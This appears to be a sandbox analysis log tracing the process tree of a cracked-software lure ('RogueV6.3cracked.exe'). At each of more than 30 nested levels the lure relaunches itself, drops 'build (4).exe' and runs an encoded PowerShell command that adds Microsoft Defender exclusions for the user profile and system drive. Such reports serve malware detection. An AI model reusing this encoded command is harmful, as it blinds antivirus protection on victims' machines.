C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="10⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5088
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"10⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1124
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"10⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:2248 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="11⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4720
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"11⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2932
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"11⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:4136 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="12⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4444
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"12⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4564
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"12⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:4004 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="13⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:560
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"13⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2624
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"13⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:3168 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="14⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2752
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"14⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1844
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"14⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:3164 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="15⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4128
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"15⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3352
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"15⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:2668 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="16⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3524
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"16⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1568
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"16⤵
- Checks computer location settings
PID:3956 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="17⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4540
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"17⤵
- Executes dropped EXE
PID:2552
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"17⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:1964 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="18⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5304
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"18⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5312
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"18⤵
- Checks computer location settings
PID:5352 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="19⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5496
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"19⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5504
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"19⤵
- Checks computer location settings
PID:5532 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="20⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5784
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"20⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5820
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"20⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:5852 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="21⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6000
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"21⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6044
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"21⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:6128 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="22⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5392
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"22⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5608
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"22⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:5668 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="23⤵
- Suspicious use of AdjustPrivilegeToken
PID:5488
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"23⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6012
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"23⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:5096 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="24⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5428
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"24⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6056
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"24⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:5684 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="25⤵
- System Location Discovery: System Language Discovery
PID:6140
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"25⤵
- Executes dropped EXE
PID:1388
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"25⤵
- System Location Discovery: System Language Discovery
PID:6084 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="26⤵PID:6152
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"26⤵PID:6184
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"26⤵PID:6216
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="27⤵PID:6428
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"27⤵PID:6436
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"27⤵PID:6496
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="28⤵PID:6660
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"28⤵PID:6668
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"28⤵PID:6740
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="29⤵PID:6884
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"29⤵PID:6896
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"29⤵PID:6956
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="30⤵PID:7124
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"30⤵PID:7148
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"30⤵PID:5568
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="31⤵PID:5196
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"31⤵PID:6648
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"31⤵PID:6568
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="32⤵PID:6932
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"32⤵PID:6744
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"32⤵PID:7004
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="33⤵PID:6704
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"33⤵PID:7044
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"33⤵PID:6964
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="34⤵PID:6792
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"34⤵PID:6816
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"34⤵PID:7216
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="35⤵PID:7404
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"35⤵PID:7428
-
-
